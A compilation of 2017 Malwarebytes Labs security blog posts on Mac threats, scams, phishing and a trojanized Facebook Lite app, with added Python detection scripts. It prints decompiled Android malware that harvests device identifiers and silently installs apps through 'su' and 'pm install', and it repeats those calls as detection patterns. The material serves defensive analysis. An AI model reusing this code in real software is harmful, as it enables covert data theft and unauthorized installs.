The post “Federal Ministry of Agriculture” 419 spam appeared first on Malwarebytes Labs.


Mac security facts and fallacies

Malwarebytes - Wed, 03/08/2017 - 16:00

There are many Mac security myths circulating among users. So how can you tell if the advice you’re reading is fact or fallacy? Read on to find out!

Fallacy: Macs don’t get viruses

The idea that there are no viruses for the Mac goes back to the beginning of Mac OS X, at the very beginning of this millennium. Most people associate this idea most strongly with the “I’m a Mac/I’m a PC” commercials from a decade ago, such as this one that ran in 2006:

Unfortunately, this is a myth. As with most good myths, though, there’s a slight element of truth.

Technically speaking, a virus is malware that spreads by itself, by attaching itself to other files. By this strict definition, there are no Mac viruses. However, by that token, there also aren’t very many Windows viruses these days, either. Viruses have mostly disappeared from the threat landscape.

The average person, though, understands a virus to be any kind of malicious software. (A better term for this is “malware.”) Since there definitely is malware for the Mac, as well as a plethora of other threat types, the spirit of the “there are no Mac viruses” claim is completely false. Don’t allow yourself to be misled!

Fact: There’s not much Mac malware out there

True malware is malicious in nature—thus the name, malicious software—with the goal of stealing or scamming data or money from the user. Examples of malware are backdoors that provide access to the computer, spyware that logs keystrokes and captures pictures with the webcam, ransomware that encrypts the user’s files in order to hold them for ransom, and other such nefarious programs.

On the Mac, true malware is rare. A “big spike” of new Mac malware happened in 2012, when 11 new pieces of malware appeared. The average Mac user has never seen any malware.

So why should Mac users be concerned? Because other threats are a rapidly growing problem on the Mac. Over the last several years, there has been an increasing amount of adware and Potentially Unwanted Programs (PUPs) for the Mac.

Adware is software that injects ads into websites where they don’t belong and changes your search engine to a different one. Adware is designed to scam advertisers and search engines. The infected Macs are no more than a vehicle for generating revenue fraudulently from advertisers and search engines, who pay these adware-producing “affiliates” for referrals.

PUPs are programs that are generally unwanted by users. These can include so-called “legitimate” keyloggers (marketed as a means for monitoring your kids or employees), scammy “cleaning” apps (Macs don’t need that kind of cleaning), supposed “antivirus” or “anti-adware” apps that don’t actually detect anything, and so on.

Adware and PUPs are a serious problem on the Mac right now. Although these things are not malware, they are a huge nuisance. Worse, they can create security vulnerabilities that make it more likely for you to get infected with actual malware. For example, in 2015, a vulnerability in a common PUP (MacKeeper) was used to install malware on Macs that had MacKeeper installed.

Fallacy: Macs are more secure than Windows

Many years ago, Apple abandoned the old “classic” Mac system in favor of one based on Unix, a mature and security-oriented system. Apple has made some great security improvements to macOS in recent years, and as a result, Macs are more secure today than they ever have been.

Of course, nothing is ever perfect, and macOS security is certainly far from it. There are plenty of ways to circumvent Mac security. Add to this the fact that the security of Windows has improved over the years as well, and it becomes difficult to say which system is more secure.

As with other such myths, there’s an element of truth here, though. Macs certainly suffer under a far smaller burden of threats than Windows. Many thousands of new Windows malware variants appear every day, while it’s a busy month in the Mac world if more than one new piece of malware appears. This means that, although there may not be any explicit, major security differences between the two systems, Macs do tend to be statistically safer simply due to the smaller number of threats.

Fact: macOS has built-in anti-malware software

This is true, although the feature is well hidden from the user and cannot be turned off. Apple’s anti-malware software is called XProtect, and it consists of some basic signatures for identifying known malicious apps.

When you try to open an app for the first time, the system will check it against the XProtect signatures. If the app matches one of those signatures, the system won’t allow it to open.

Of course, there are a couple of problems with XProtect. First, as with any signature-based detection, it can only detect and block malware that Apple has seen before.

More importantly, though, it only detects malware. Since the vast majority of the threats for Macs are adware and PUPs, that leaves a lot that it doesn’t protect against. You shouldn’t rely on XProtect as your sole protection against threats, but nonetheless, it is a very good layer of protection to have as an integral part of the system.

Fallacy: Macs don’t need security software

Antivirus software has gotten a bad rap on the Mac over the years. Thanks to the historically low incidence of Mac malware, coupled with the system problems that some antivirus programs have been known to cause, Mac users are skittish about installing security software. Making matters worse, Mac “experts” will tell people that they don’t need security software, because macOS contains all the protection they need.

However, the number of Mac users infected by malware and other Mac threats has had exponential growth since 2010, when adware and PUPs weren’t really a thing on the Mac yet and when new malware sightings were few and far between. We’re seeing large numbers of people infected with Mac threats every day, on a much larger scale than even just a few years ago.

Clearly, there is an epidemic problem with threats—mostly adware and PUPs—on the Mac, and also clearly, the built-in security in macOS is not adequate to deal with this problem. It is becoming increasingly necessary for Mac users to have an additional layer of security, and in particular, to have something that is effective against adware and PUPs, which are the biggest problem. If you’re a Mac user, you might consider downloading software such as Malwarebytes Anti-Malware for Mac, which removes adware, PUPs, and malware for free.

The post Mac security facts and fallacies appeared first on Malwarebytes Labs.


A multi-purpose fake online scanner

Malwarebytes - Tue, 03/07/2017 - 16:00

Just to show you that behind some PUPs there are threat actors that are too lazy to be bothered, we offer you a fake online scanner that was used to promote the infamous MacKeeper and a Windows system optimizer called Advance-System-Care.


The redirect scheme on a Windows machine looked like this.

From a compromised website we were re-directed to systemcheck[.]club where we got this popup:

Clicking “OK” offered to start an online scan –

– which claimed to find a HIGH risk virus:

Thankfully these helpful people knew just the tool to remove this virus from our PC and brought us to www[.]advancepctools[.]info:

Here we installed Advance-System-Care which did not find the virus, but nevertheless had some very important tips on how to improve the system’s performance.

Pro tip: that phone number will not work as there is a format error in it.

That Advance-System-Care did not find the alleged virus is not surprising as Tapsnake is an Android infection that doesn’t work on Windows machines.

One other thing that did puzzle me, was that I also got this prompt while visiting the systemcheck[.]club site:

A Windows Internet Explorer prompt letting me know that: “VIRUS FOUND. It is necessary repair your Mac. Please do not leave the page. Click OK to begin the repair process.”

But when I showed this to our Mac researchers they had a very plausible explanation for this. Exactly the same fake scan is used to push MacKeeper on Mac systems.


My colleague @thomasareed recorded the proceedings on a Mac system, leading to the install of MacKeeper:

As you can see, the scan and the scan results are exactly the same. Only MacKeeper is consistent by finding the same threat (Tapsnake) on the system.


Although this setup seems to be designed for Mac users, it must have been considered a waste to not do anything with the Windows users that got sucked in. So a redirect was designed to provide a PUP system optimizer for these users.

Detection and protection

The site hosting the fake scanner and all the next steps in the redirection chain are blocked by Malwarebytes Premium Web Protection module.

The installer for Advance-System-Care is detected as PUP.Optional.AdvanceSystemCare.

SHA256: 164cb18150d242e88de70b9f0e35478ab9aab88e0b723472dfdc278f6ea025da

Malwarebytes removes Advance-System-Care completely. A removal guide for Advance-System-Care can be found on our forums.
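The indicators above (the two domains in the redirect chain and the installer’s SHA256) are only useful if they get matched against something. As an added example that is not part of the original post or of any Malwarebytes tooling, here is a small Python script that refangs the indicators as written above, matches them against a constructed proxy log (the log lines and client addresses are made up), and hashes a downloaded file against the published SHA256. The subdomain check is deliberately a dot-boundary match so that `notsystemcheck.club` does not hit.

```python
import hashlib
from urllib.parse import urlparse

# Indicators lifted from the post above, kept defanged exactly as written there.
IOC_DOMAINS_DEFANGED = {"systemcheck[.]club", "www[.]advancepctools[.]info"}
IOC_SHA256 = {"164cb18150d242e88de70b9f0e35478ab9aab88e0b723472dfdc278f6ea025da"}


def refang(indicator):
    """Turn a defanged indicator such as example[.]com back into a matchable string."""
    return (indicator.replace("[.]", ".").replace("(dot)", ".")
            .replace("hxxp", "http").lower())


IOC_DOMAINS = {refang(d) for d in IOC_DOMAINS_DEFANGED}


def domain_matches(host):
    """True if host is a listed indicator or a subdomain of one (never a bare suffix match)."""
    host = (host or "").lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)


# Constructed proxy log (not from the post): time, client, method, URL, referer.
SAMPLE_PROXY_LOG = """\
2017-03-07T15:58:01Z 10.0.0.12 GET http://compromised-blog.test/post/1 -
2017-03-07T15:58:02Z 10.0.0.12 GET http://systemcheck.club/?ref=x http://compromised-blog.test/post/1
2017-03-07T15:58:09Z 10.0.0.12 GET http://www.advancepctools.info/setup.exe http://systemcheck.club/
2017-03-07T15:59:30Z 10.0.0.33 GET http://cdn.systemcheck.club/scan.js -
2017-03-07T16:00:00Z 10.0.0.45 GET http://notsystemcheck.club/ -
"""


def find_redirect_hits(log_text):
    """Return (client, url) for every request whose host matches an IoC domain."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        client, url = parts[1], parts[3]
        if domain_matches(urlparse(url).hostname):
            hits.append((client, url))
    return hits


def clients_reaching_pup_download(log_text):
    """Clients that got all the way to the PUP download host: the ones worth a closer look."""
    return sorted({c for c, u in find_redirect_hits(log_text)
                   if (urlparse(u).hostname or "").lower() == "www.advancepctools.info"})


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def is_known_pup_installer(data):
    """Compare a downloaded file's SHA256 with the hash published above."""
    return sha256_hex(data) in IOC_SHA256


if __name__ == "__main__":
    for client, url in find_redirect_hits(SAMPLE_PROXY_LOG):
        print("redirect-chain hit:", client, url)
    print("clients that reached the download site:", clients_reaching_pup_download(SAMPLE_PROXY_LOG))
```

Feeding the script a real proxy export instead of the constructed sample only requires the same five whitespace-separated columns; anything shorter is skipped rather than misparsed.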


Special thanks to @thomasareed for sharing his research on the Mac side and @MysteryFCM for pointing out the URL.


Pieter Arntz

The post A multi-purpose fake online scanner appeared first on Malwarebytes Labs.


Malwarebytes Labs Presents: The Cybercrime Tactics and Techniques Report

Malwarebytes - Mon, 03/06/2017 - 18:04

Last year was interesting for malware distribution and development. While we still experienced a flood of ransomware and immense distribution of malware using malspam/phishing/exploit kits, some major players, such as TeslaCrypt and Angler EK, vanished, while some new names dominated.

In our first wrap-up of the threat landscape, we are going to cover the trends observed during the last few months of 2016, provide an analyst’s view of the threats, and offer some predictions for the beginning of 2017. Moving forward, every quarter we will bring you a view of the threat landscape through the eyes of Malwarebytes researchers and analysts.


Thanks for reading and safe surfing!

The post Malwarebytes Labs Presents: The Cybercrime Tactics and Techniques Report appeared first on Malwarebytes Labs.


Mobile Menace Monday: Facebook Lite infected with Spy FakePlay

Malwarebytes - Mon, 03/06/2017 - 16:00

A version of the popular mobile app Facebook has been found to be infected with what we detect as Android/Trojan.Spy.FakePlay. Facebook Lite is a more compact version of the popular app that uses less data and claims to work in all network conditions (i.e. even where network conditions are poor).

The infected Facebook Lite works as advertised, but with the addition of malicious activities. It does this by using a malicious receiver and service. Note the receiver and service names, which attempt to hide under what some may take to be Google Update; something an untrained eye may not catch.

The service runs whenever the phone is booted, and immediately starts the receiver.

Log entry from Android Device Monitor

The receiver contains the bulk of the malicious code. Below are some chunks of code that steal personal information and install additional malicious apps.

Code that steals and sends device ID, System Version, MAC address, Phone Model, Location, etc:
WifiInfo localWifiInfo = ((WifiManager)getSystemService("wifi")).getConnectionInfo();
HashMap localHashMap = new HashMap();
localHashMap.put("DeviceId", paramTelephonyManager.getDeviceId());
localHashMap.put("SystemVersion", Build.VERSION.RELEASE);
localHashMap.put("Mac", localWifiInfo.getMacAddress());
localHashMap.put("PhoneType", Build.MODEL);
localHashMap.put("NetworkOperatorName", paramTelephonyManager.getNetworkOperatorName());
localHashMap.put("SimSerialNumber", paramTelephonyManager.getSimSerialNumber());
localHashMap.put("Location", a());

Code to install additional apps:
localProcess = Runtime.getRuntime().exec("su");
PrintWriter localPrintWriter = new PrintWriter(localProcess.getOutputStream());
localPrintWriter.println("chmod 777 " + paramString);
localPrintWriter.println("export LD_LIBRARY_PATH=/vendor/lib:/system/lib");
localPrintWriter.println("pm install -r  " + paramString);

In computing, a Trojan is, to quote Wikipedia, “any malicious computer program which is used to hack into a computer by misleading users of its true intent.” This particular piece of mobile malware is a perfect example; it misleads by infecting a legitimate app with malicious code and then hides its presence under the name of a well-known corporation.

This infected version of Facebook Lite originates from China, based on characters found in the code. China does not have access to Google Play and relies on third-party app stores that sometimes contain malicious apps like this. If you are in a country that has access to Google Play, we suggest using it over third-party app stores to avoid such infections. Stay safe out there!
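The two decompiled snippets above are a good illustration of why a static triage pass over repackaged apps pays off: none of those calls belong in a social networking client. As an added example, written for this post and not taken from it or from any Malwarebytes tool, the Python script below scans decompiled Java text for exactly the API calls shown above, grouped into what they are good for, and checks a manifest for receiver or service class names that borrow Google’s name outside a `com.google` package. That naming heuristic, the category grouping and the scoring are my own assumptions; the sample class and manifest are constructed (the package name `com.example.repacked.lite` is made up), built around the calls the post quotes.

```python
import re

# Regexes over decompiled Java text, grouped by what the call is good for. The API calls
# come from the snippets in the post; the grouping and scoring are my own heuristics.
INDICATORS = {
    "device_fingerprint": [
        r"\.getDeviceId\(\)", r"\.getSimSerialNumber\(\)", r"\.getMacAddress\(\)",
        r"\.getNetworkOperatorName\(\)", r"Build\.MODEL", r"Build\.VERSION\.RELEASE",
    ],
    "root_shell": [r'Runtime\.getRuntime\(\)\.exec\(\s*"su"\s*\)', r"chmod 777"],
    "silent_install": [r"pm install -r", r"LD_LIBRARY_PATH=/vendor/lib"],
}


def scan_source(java_text):
    """Map each indicator category to the patterns that actually appear in the text."""
    found = {}
    for category, patterns in INDICATORS.items():
        hits = [p for p in patterns if re.search(p, java_text)]
        if hits:
            found[category] = hits
    return found


def impersonating_components(manifest_xml):
    """Heuristic (assumption): a receiver or service whose class name borrows Google's name
    while living outside a com.google package is trying to look like a system component."""
    m = re.search(r'package="([^"]+)"', manifest_xml)
    package = m.group(1) if m else ""
    flagged = []
    for comp in re.finditer(r'<(receiver|service)\b[^>]*android:name="([^"]+)"', manifest_xml):
        kind, name = comp.group(1), comp.group(2)
        full_name = package + name if name.startswith(".") else name
        if "google" in full_name.lower() and not full_name.startswith("com.google."):
            flagged.append((kind, full_name))
    return flagged


def verdict(java_text, manifest_xml):
    """Combine both checks into one triage level for an analyst to act on."""
    found = scan_source(java_text)
    fakes = impersonating_components(manifest_xml)
    if "root_shell" in found and "silent_install" in found:
        level = "high"      # shells out to su and installs packages: nothing a social app needs
    elif len(found) >= 2 or fakes:
        level = "medium"
    elif found:
        level = "low"
    else:
        level = "none"
    return {"level": level, "indicators": found, "impersonating": fakes}


# Constructed sample: the calls quoted in the post wrapped in a made-up class, plus a made-up manifest.
SAMPLE_JAVA = '''
public class GoogleUpdateReceiver extends BroadcastReceiver {
  void collect(TelephonyManager paramTelephonyManager) {
    WifiInfo localWifiInfo = ((WifiManager)getSystemService("wifi")).getConnectionInfo();
    HashMap localHashMap = new HashMap();
    localHashMap.put("DeviceId", paramTelephonyManager.getDeviceId());
    localHashMap.put("SystemVersion", Build.VERSION.RELEASE);
    localHashMap.put("Mac", localWifiInfo.getMacAddress());
    localHashMap.put("PhoneType", Build.MODEL);
  }
  void install(String paramString) throws Exception {
    Process localProcess = Runtime.getRuntime().exec("su");
    PrintWriter localPrintWriter = new PrintWriter(localProcess.getOutputStream());
    localPrintWriter.println("chmod 777 " + paramString);
    localPrintWriter.println("pm install -r  " + paramString);
  }
}
'''

SAMPLE_MANIFEST = '''
<manifest package="com.example.repacked.lite">
  <application>
    <service android:name=".GoogleUpdateService" />
    <receiver android:name="com.example.repacked.lite.GoogleUpdateReceiver" />
    <receiver android:name="com.google.android.example.Receiver" />
  </application>
</manifest>
'''

if __name__ == "__main__":
    print(verdict(SAMPLE_JAVA, SAMPLE_MANIFEST))
```

Against real output from a decompiler, run `scan_source` over each class file and `impersonating_components` over `AndroidManifest.xml`; a legitimate app that merely reads `Build.MODEL` scores low, while the su-plus-`pm install` pair alone is enough for a high rating.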

Malicious MD5 samples:

The post Mobile Menace Monday: Facebook Lite infected with Spy FakePlay appeared first on Malwarebytes Labs.


Free antivirus coupon leads to tech support scam

Malwarebytes - Fri, 03/03/2017 - 16:00

In a previous blog post, we showed how users were redirected to a tech support scam page via a rogue Google Chrome extension. This time we take a look at another clever ruse to trick you into calling for assistance, and ultimately getting scammed.

This scheme is actually hosted on the same domain that was running the fake Windows support we described before and our assumption is that users are redirected to this coupon page via a similar malvertising campaign.

It plays on special offers, discounts and time-limited deals to entice you to claim your product now, choosing between Norton or McAfee. After filling in your personal details (which are actually sent off to the crooks), a page simulates the offer being processed only to fail with an error message. Victims are misled into thinking that their offer was redeemed, but that they must perform a final call to get it completed.


This is where the tech support scam comes in. Once you call that number, you are routed to an Indian boiler room where one of many agents will take remote control of your computer to figure out what went wrong. (Un)shockingly, the bogus technician will identify severe problems that need an immediate fix.

Despite the scam being about Norton, the technician brushes it off as useless when it comes to the real deal: “Junk is a kind of virus which is the most harmful virus”. With his technical expertise, he proceeds to highly recommend the most expensive plan, for a lifetime low price of $400.

Of course, there is nothing there, it’s a pure rip-off where once they have your money, they couldn’t care less about helping you out (for a problem you didn’t have in the first place anyway).

The crooks are using as the placeholder to download remote software and host the payment platform:


There are other scam domains also hosted on this IP ( is familiar and related to a previous investigation where the owner of that tech support company incriminated himself by posting a comment on our blog which shared the same IP address as the remote technician who had just scammed us.

As always, please stay vigilant online when you see free coupons or other similar offers. They often are the gateway to a whole lot of trouble. For more information on tech support scams, please visit our page here.

The post Free antivirus coupon leads to tech support scam appeared first on Malwarebytes Labs.


Coachella-gate: fire in the disco

Malwarebytes - Thu, 03/02/2017 - 19:09

I’d like to make some smart references to the Coachella event, except that I’ve only heard of about six of the acts, one of them is named after a TV show and I mean, come on…”Swet Shop Boys”?

Instead, I’ll begin by pointing out that the last time I went to a music festival was in 2001, and there was a huge riot, a power generator exploded and set my tent on fire, and I was stranded on a hill at 2AM with half a dozen firemen holding axes. I am not the right person to ask, unless you want to know about sleeping in a ditch at 2AM with no tent due to it being a smoking pile of burnt ash.

I mentioned the exploded and very much on fire generator, right?

All well and good, but what we have here is a different kind of risk, in the form of a compromised database up for grabs on the Dark Web. The data swiped includes the following:

Usernames, first and last names, shipping addresses, email addresses, phone numbers and dates of birth.

You don’t even need to know Beyonce pulled out of the event to know this isn’t a good thing, as it opens the door to very personalized phishing attempts. Smooth criminals will no doubt fire off some fake refund/special festival deals at people who may not know about the breach, so it’s crucial we heal the world by ensuring word gets out about what happened.

If, after you’ve finished working 9 to 5, you become a calendar girl and spend a perfect day mapping out upcoming events for a nice Saturday in the park—and yes, this is the obligatory section jamming in as many song titles as possible, I won’t do it again—then you should keep one hand in your pocket, and the other pointing at dubious emails (Sorry. Sorry. Won’t do it again. And anyway, it wasn’t me).

The good news is, no payment information was compromised—but by the same token, cards can be canceled and replaced. It’s a bit trickier to replace the information swiped above, to varying degrees of difficulty and/or time-wasting inconvenience. Lots of techniques exist for spotting a fake mail and more often than not a few moments of fact checking works wonders.

If you’re off to Coachella this year, have a good time and remember to go directly to the source where all email missives are concerned. There may be dancing in the street in California, but the man who sold the world—and quite possibly your home address—is still in no immediate danger of having some Folsom city blues.


Chris “Martin” Boyd

The post Coachella-gate: fire in the disco appeared first on Malwarebytes Labs.


Australians beware: myGov phishing on the prowl

Malwarebytes - Thu, 03/02/2017 - 16:00

In Australia, myGov is a “simple and secure way to access government services online”.

  • Secure access to a range of government services using one username and password
  • A single inbox for your messages from Centrelink, Medicare, Child Support and the Australian Taxation Office
  • A quick and easy way to advise selected member services about changes to some of your personal details

Unfortunately, phishing campaigns happily target such services given the plentiful data a successful scam can harvest with relative ease. Here’s a nasty one which was doing the rounds a week or so ago via email:

Australian government and myGov must verify your identity!

This is a notification email only. Please do not reply to this email as this mailbox is not monitored.

This is a message from the myGov team.

Australian government and myGov must verify your identity – (Part 4.2, paragraph 4.2.13 of the AML/CTF rules).

Click “Go to myGov” and start the verification process.

Thank you

The URL – which we’ve reported and has been taken offline – seems to have been a compromised website, located at


The landing page is a carbon copy of the real myGov login screen and asks for a myGov username and password.

For a more typical phish, that might be as far as the scammers go; here, the data grab is rather spectacular as we progress to the next page:

The text reads as follows:

Australian Government and myGov must verify your identity – (Part 4.2, paragraph 4.2.13 of the AML/CTF Rules).
To upload your identity documents please use the ‘Browse’ button.

Important Tips
Ensure that you upload a high quality copy of the front and back of your licence and that it is straight and not on an angle. We only accept valid Australian Drivers Licenses.
Ensure that you upload a high quality copy of your passport and that it is straight and not on an angle. We only accept valid Australian Passports.

Front of Australian Drivers License Unlinked
Back of Australian Drivers License Unlinked
Australian Passport Unlinked

Yes, that is the phishing page asking the victim to browse their PC and upload copies of their passport and front/back of their driver’s license. They’re not done yet, however, presenting them with a dropdown urging the victim to “Link their banking account”. This is where things become very interesting – note the design change. It still says “Australian Government – myGov” at the top, but we’re suddenly presented with narrow rectangles, almost like we’re looking at a totally different style of site:

There are multiple banks listed, but only two are able to be selected – Citibank and Commonwealth Bank. Regardless of which one is picked, the scammers then ask for:

Client number and password

Mother’s maiden name
Phone number
Telephone banking passcode

Note the first reference to something called “Poli ID”. At this point, it simply appears to be “some bank stuff” related to the overall process and probably wouldn’t attract too much attention. It’ll become important later.

For now, the scammers stick with the theme of mobile banking:

A one time PIN has been sent via SMS to your registered mobile. Please enter the 6 digit OTP below and select continue.

The scammers send the bank info via: [form id=”stpForm” action=”safe2(dot)php” method=”post” name=”date”], and then we see what claims to be an attempted payment failure message, via some code in the page’s HTML:


Polipay is an Australian payment system which allows you to “use your internet banking to securely pay for goods and services”. If you’re a website owner, you can potentially become a merchant and integrate payment facilities into your site.

As it happens, both Citibank and Commonwealth Bank can be used with Poli – which are the only two banks the phish page lets you choose from. The scammer is – for reasons known only to them – popping a hardcoded “payment failed” message to the tune of $1,000 (Australian dollars?). The supposed attempted payment appears as though it’s being sent to a Bitcoin wallet via Coinspot(dot)com, listed in the code under the “merchant” tag.

Here is the failed payment attempt message that pops no matter what you do:

What the phishers have done here is start off with a myGov phish to set the scene, then divert the victim into a payment flow entirely unrelated to anything myGov, and modeled the “link your bank account to myGov” section on Polipay (check out the demo).

It’s not possible for the $1,000 payment to go out, as the stolen information is being collected and sent to scammers via a .php page, and not using Polipay. We notified Polipay on Twitter (Feb 14th) and by email on Feb 15th, and their reply is as follows:

It seems the culprit has screen grabbed screens from a transaction and manipulated them to gain the information they require. This series of screens was hosted on the culprits URL.

The screens grabbed where [sic] from an incomplete transaction with a POLi merchant.

User awareness on the internet is an important factor – specifically, knowing how to ensure the identity of a website owner. POLi employs Extended Validation SSL for its payment systems which makes it clear to users that they are making a payment through a POLi Payments service website. Sites claiming to be POLi which don’t bear this level of company validation are imposters/scammers/phishers etc.

It’s a bit of an odd thing to do with a live phish, as up until the end part of the scam the victim wouldn’t have any idea about the Polipay / Coinspot side of things. If you wanted to keep the victim unaware that something funny is going on, I couldn’t think of a worse way to do it than randomly telling them “HEY THIS PAYMENT HAS FAILED” because the natural reaction would be “…what payment?”

This is a pretty interesting con job, then, and regardless of what the scammers were up to they’d still have the victim’s other information such as the uploaded documentation.
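The structure of this phish is what gives it away: a password form posting somewhere other than the brand’s own host, file inputs asking for licence and passport scans, and a payment form (the `stpForm` posting to `safe2.php` described above) carrying hard-coded merchant and amount fields. As an added example, not from the post and not from any Malwarebytes or POLi code, the Python script below parses a page with the standard library’s HTML parser and reports those three patterns. The sample page is constructed to mirror the stages described above (the page host `compromised-site.test` and the merchant value are made up); the expected host is the one the legitimate login lives on, `my.gov.au` for myGov.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

IDENTITY_DOC_WORDS = ("licen", "passport")   # "licen" covers both licence and license
PAYMENT_FIELDS = {"merchant", "amount", "currency"}


class FormCollector(HTMLParser):
    """Collect every <form> together with the <input> elements inside it."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._current = {"id": a.get("id", ""), "action": a.get("action", ""),
                             "method": (a.get("method") or "get").lower(), "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append({"type": (a.get("type") or "text").lower(),
                                            "name": a.get("name", ""), "value": a.get("value", "")})

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def analyse_page(html_text, page_url, expected_host):
    """Return human-readable findings for forms that behave like the phish described above."""
    parser = FormCollector()
    parser.feed(html_text)
    findings = []
    for form in parser.forms:
        label = form["id"] or form["action"] or "(unnamed form)"
        # A relative action resolves against the page itself, so the phishing host shows up here.
        target_host = (urlparse(urljoin(page_url, form["action"])).hostname or "").lower()
        types = {i["type"] for i in form["inputs"]}
        if "password" in types and target_host != expected_host:
            findings.append(f"{label}: password submitted to {target_host}, not {expected_host}")
        doc_uploads = [i["name"] for i in form["inputs"]
                       if i["type"] == "file" and any(w in i["name"].lower() for w in IDENTITY_DOC_WORDS)]
        if doc_uploads:
            findings.append(f"{label}: requests identity document uploads {doc_uploads}")
        hidden_pay = [(i["name"], i["value"]) for i in form["inputs"]
                      if i["type"] == "hidden" and i["name"].lower() in PAYMENT_FIELDS]
        if hidden_pay:
            findings.append(f"{label}: carries hard-coded payment fields {hidden_pay}")
    return findings


# Constructed page (not the real phish): three forms shaped like the stages described above.
SAMPLE_PAGE = """
<html><body>
<form id="login" action="/login.php" method="post">
  <input type="text" name="username"> <input type="password" name="password">
</form>
<form id="docs" action="upload.php" method="post" enctype="multipart/form-data">
  <input type="file" name="licence_front"> <input type="file" name="licence_back">
  <input type="file" name="passport">
</form>
<form id="stpForm" action="safe2.php" method="post" name="date">
  <input type="text" name="client_number"> <input type="password" name="netbank_password">
  <input type="text" name="otp">
  <input type="hidden" name="merchant" value="constructed-merchant.test">
  <input type="hidden" name="amount" value="1000.00">
</form>
</body></html>
"""
SAMPLE_PAGE_URL = "http://compromised-site.test/mygov/verify.html"   # constructed host

if __name__ == "__main__":
    for finding in analyse_page(SAMPLE_PAGE, SAMPLE_PAGE_URL, "my.gov.au"):
        print(finding)
```

Run against the saved HTML of a suspect page with the URL it was served from; the same page served from the legitimate host loses the two password findings but still trips on the document uploads and the hard-coded payment fields, which is the point: those two never belong on a government login flow.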

Always be wary if asked for the kind of information requested up above, and if in doubt, contact the relevant official body directly, whether bank or Government portal. It’ll potentially save you time, effort, money, and a couple of forms of identification to boot.

Chris Boyd (Thanks to Steven and Nathan for additional information)

The post Australians beware: myGov phishing on the prowl appeared first on Malwarebytes Labs.


Two new Mac backdoors discovered

Malwarebytes - Wed, 03/01/2017 - 15:00

On Valentine’s Day, Mac users got a special “treat” in the form of new malware. Then, later that same week, there were signs of yet another piece of malware looming. These threats were overshadowed a bit by the discovery last week of the second ransomware app to ever appear on the Mac, but they’re still worthy of consideration.

The first malware, named XAgent, was analyzed by Palo Alto Networks. XAgent, it turns out, is related to the Komplex malware discovered by Palo Alto last year, as can be seen by comparing some of the strings to those found in Komplex.

At that time, Palo Alto tied Komplex to the Sofacy Group – also known by the names Fancy Bear and APT28, among others – a Russian hacking organization that has since been linked to such things as the hack of the Democratic National Convention.

XAgent is a backdoor that provides a number of powerful remote access features, including keylogging, screenshots, remote shell access, and file exfiltration. Of particular interest is a command that provides the hacker with information about iOS backups stored on the infected Mac. iPhones (and other iOS devices) are notoriously difficult to hack, but by targeting backups instead, this malware could access potentially sensitive iPhone data.

Patrick Wardle, Director of Research at Synack, had another interesting revelation about this malware. He shows quite convincingly that the Sofacy Group used code copied from the Hacking Team. (Hacking Team is the creator of the Remote Control System backdoor, which it sells to governments and law enforcement, among other organizations.)

Hacking Team was itself the victim of a hack in 2015, and all their source code was made public. Wardle was able to demonstrate key similarities, such as identical bugs, in the decompiled XAgent code and the leaked Hacking Team code. It appears that Sofacy used Hacking Team code in their malware, most likely obtained from the Hacking Team breach.

According to a whitepaper released by Bitdefender, the malware installs itself into the following folder, where it is given one of a set of hard-coded names:


At the time of its discovery, the XAgent command & control servers were down, meaning that this variant of the malware is no longer a threat.

On the heels of the XAgent discovery came an intriguing glance at another piece of Mac malware, a sample of which has not yet been found. Three days after Palo Alto released their analysis of XAgent, Apple released an update to XProtect – the built-in anti-malware software in macOS – that added detection of XAgent.

However, that update also included a signature for something Apple called OSX.Proton.A, which ignited a storm of questions in the security community, who had never heard of any such malware for the Mac.

A little digging by Arnaud Abbati, a researcher at Ninja, Inc, turned up a page from the Sixgill website with a terse description of a remote access tool (RAT) called Proton. The page has been taken down, but can still be found in Google’s cache here.

Apparently, the malware is being sold on a Russian cybercrime forum, among other places. Sixgill also provided a link to a YouTube video from December, apparently made to promote the malware by demonstrating its capabilities. Another YouTube video, posted on February 8, showed additional capabilities.

Unfortunately, thus far, no samples of the malware have been found. It does not appear to be in the VirusTotal database, and neither of the sites that appear to be associated with Proton (ptn[dot]is or protonsolutions[dot]net) are responding. Even Sixgill’s analysis seemed to be done entirely from online sources, and had no information to suggest that they had seen a copy of the malware. For now, this is a completely unknown threat with rather frightening apparent capabilities.

Two new malware threats in a week, added to the others previously seen this year (Quimitchin/Fruitfly, MacDownloader, a new class of Microsoft Office macro malware and the Findzip ransomware), brings the Mac malware count for 2017 up to 6, and February isn’t even over yet. If things continue at this rate, 2017 could see a spike in Mac malware that could rival or exceed the previous high point in 2012, when the infamous Flashback, and a number of other pieces of malware taking advantage of Java vulnerabilities, terrorized the Mac community.

The post Two new Mac backdoors discovered appeared first on Malwarebytes Labs.


Decrypting after a Findzip ransomware infection

Malwarebytes - Tue, 02/28/2017 - 16:00

The Findzip ransomware was discovered on February 22, 2017. At that time, it was thought that files would be irreversibly encrypted by this ransomware, with no chance of decryption. Turns out, that’s not quite true.

For those who get infected with Findzip (aka Filecoder), it’s still true that the hackers behind it can’t give you a key to decrypt it. There’s no honor among these particular thieves, as they’re lying about their ability to help if you pay the ransom.

However, all hope is not lost! If you made the mistake of not having a backup, or if your backup was also compromised by the ransomware, there’s still a chance for you to recover. It will not be fast or easy, but by following the instructions in this article, you’ll be able to regain your files. These instructions will be daunting for many, so if you have any doubts about your ability to follow them, please seek help from someone with more experience.

Special thanks to Jérôme Segura and @TheWack0lian for their help with this procedure. I wouldn’t have been able to build these instructions without their advice!

Gathering the materials

There are a few things you’re going to need before you get started.

  1. A working computer
  2. Xcode or TextWrangler
  3. Xcode command-line tools
  4. pkcrack source code
  5. One unencrypted file and the corresponding encrypted file

First, of course, you’ll need a working computer. This could be something like a second computer or could be another user account on the infected Mac. If you managed to force-quit the malware before it encrypted your whole user account, you may even be able to continue using your existing account.

These instructions assume that you’ll be doing the work on a Mac. If you need to do the decryption on a Windows or Linux computer, you’ll need to figure out how to compile and use pkcrack on that system.

